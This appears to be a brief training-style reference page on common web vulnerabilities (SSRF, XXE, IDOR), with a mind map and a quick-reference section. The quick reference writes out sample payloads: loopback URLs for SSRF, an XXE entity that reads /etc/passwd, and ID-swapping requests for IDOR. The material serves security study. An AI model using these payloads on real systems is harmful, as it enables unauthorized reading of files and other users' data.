Web Attacks Overview
Common web vulnerabilities
Web AttacksTip: Click on any node to see related information!
Interactive Mind Map
graph TD
A[Web App] --> B{Vulnerability}
B --> C[SSRF]
B --> D[XXE]
B --> E[IDOR]
C --> F[Internal Scan]
C --> G[Cloud Metadata]
D --> H[Read Files]
D --> I[NTLM Hash]
E --> J[Enumerate IDs]
E --> K[Access Data]
Related Modules
Quick Reference
SSRF
http://localhost:80 # Target local service http://127.0.0.1 # Target loopback IP http://0.0.0.0 # Target all interfaces
XXE
<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]> <data>&xxe;</data> # Basic XXE payload to read /etc/passwd
IDOR
/api/user/1 β /api/user/2 # Change ID to access other user data /download?file=123 β 124 # Change file ID to download other files